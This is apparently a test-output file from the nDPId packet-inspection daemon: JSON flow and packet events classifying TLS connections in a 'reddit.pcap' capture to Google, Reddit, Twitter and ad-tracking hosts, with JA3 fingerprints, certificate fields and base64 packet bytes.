+00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1605291691029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291691029,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQbO1037mLrsxooBJXgErvAAACBAV4AQMDAwQCCArC10wIuJU7dg=="} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9476,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1605291691029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":74,"pkt_l4_len":20,"thread_ts_msec":1605291691029,"pkt":"qtsDr8lk5EKm5WPyht1gBfK\/ABQGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGgAAAAAUAQAANo6AAA="} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291696948,"flow_last_seen":1605291696948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291696948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1605291696948,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696948,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBQAAAAAoAL9IL45AAACBAWgBAIIClIhuaMAAAAAAQMDBw=="} 
+00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11227,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1605291696965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696965,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADTTrOwqAcsBIEmLB5kd7IUo3\/YpAbu3nh9OKxV4xygVoBJXgPOCAAACBAV4AQMDAwQCCArC12M3UiG5ow=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11228,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1605291696965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291696965,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBUfTisWgBAB+3eDAAABAQgKUiG5tMLXYzc="} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11229,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291696948,"flow_last_seen":1605291696965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291696965,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11233,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291696948,"flow_last_seen":1605291697033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291697033,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11239,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291696948,"flow_last_seen":1605291697034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6001,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1605291697034,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"d9.flashtalking.com","server_names":"tag.device9.com,www.tag.device9.com,fp.zenaps.com,the.sciencebehindecommerce.com,d9.flashtalking.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=tag.device9.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"8B:5C:A4:62:70:92:3A:09:C3:72:49:B2:A2:22:32:16:22:87:9D:F3"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1605291688749,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":10966,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605291690384,"flow_last_seen":1605291690520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6642,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":782,"flow_first_seen":1605291687514,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6288,"flow_tot_l4_payload_len":596288,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} 
+00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1605291690926,"flow_last_seen":1605291691284,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2470,"flow_tot_l4_payload_len":37085,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
+00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00617{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 